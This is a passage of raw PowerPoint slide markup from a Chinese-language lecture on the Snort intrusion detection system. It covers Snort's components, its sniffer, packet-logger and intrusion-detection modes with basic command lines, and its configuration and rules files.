              <a:t>Snort</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>：组成部分</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="215043" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20813D61-2B96-4EEC-9354-346AA77749FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="611188" y="2017713"/>
            <a:ext cx="8343900" cy="1771650"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>数据包解码器</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>检测引擎</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>日志和报警子系统</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="215044" name="Object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DB7CB50-7DC0-499C-98F5-68CA2B353363}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="755650" y="4221163"/>
          <a:ext cx="7918450" cy="1765300"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s216077" name="图片" r:id="rId3" imgW="3555492" imgH="859536" progId="Word.Picture.8">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="图片" r:id="rId3" imgW="3555492" imgH="859536" progId="Word.Picture.8">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="215044" name="Object 4">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DB7CB50-7DC0-499C-98F5-68CA2B3533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221163"/>
                        <a:ext cx="7918450" cy="176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50645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20154D57-714D-4826-8B8B-8F7522740EDC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Snort</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>：工作模式</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="195587" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9812755-F356-4C6E-B9C5-21423D507927}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="611188" y="2017713"/>
            <a:ext cx="8343900" cy="4435475"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>嗅探器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>嗅探器模式仅仅是从网络上读取数据包并作为连续不断的流显示在终端上。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>	./snort –v</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>	./snort –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0" err="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>vd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>	./snort –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0" err="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>vde</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>类似于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>tcpdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>功能</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18387424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498DF3EE-DCB6-463B-AB3E-CF923FD9B81E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Snort</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>：工作模式</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="195587" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B60E50EA-ADC6-4AD4-88BE-1937621724D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="611188" y="2017713"/>
            <a:ext cx="8343900" cy="3427412"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>数据包记录器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>数据包记录器模式把数据包记录到硬盘上。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>	./snort –dev –l ./log</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20315122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FA5FAF71-6EA8-40B3-AB50-07BC78A17599}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Snort</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>：工作模式</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="195587" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03873415-F72B-4812-A743-219565B09961}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="611188" y="2017713"/>
            <a:ext cx="8343900" cy="3427412"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>网络入侵检测系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>网络入侵检测模式是最复杂的，而且是可配置的。用户可以让</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Snort</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>分析网络数据流以匹配用户定义的一些规则，并根据检测结果采取一定的动作。 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>./snort –dev –l ./log –c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0" err="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>snort.conf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11813268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45FC8250-36AF-46D2-9491-ED038A1BEC73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Snort</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>：配置文件</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="195587" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9AF20CF7-36A4-478B-B791-3680DF3D20D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="611188" y="2017713"/>
            <a:ext cx="8343900" cy="1627187"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>配置文件中包括</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>rules</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>文件所在路径</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="219140" name="图片 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE8BFB2A-F47E-4BF0-85F2-5ABC4604E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849688"/>
            <a:ext cx="8208962"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53866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ABC34DAF-190E-4F06-86AF-1E60E3012F1A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Snort</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>rules</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>文件</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="220163" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7F2A6B8-21A4-4971-81D8-FADADDE1F2C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="611188" y="2017713"/>
            <a:ext cx="8343900" cy="1627187"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>包含了多项规则，由特征匹配实现入侵检测</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="220164" name="图片 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D3A5E6D-FAE7-440B-A836-0BA1AF748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32100"/>
            <a:ext cx="9144000" cy="40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07979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C3EE8B5B-54D9-49F0-8503-5EA0742706DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Snort</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>规则（1）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
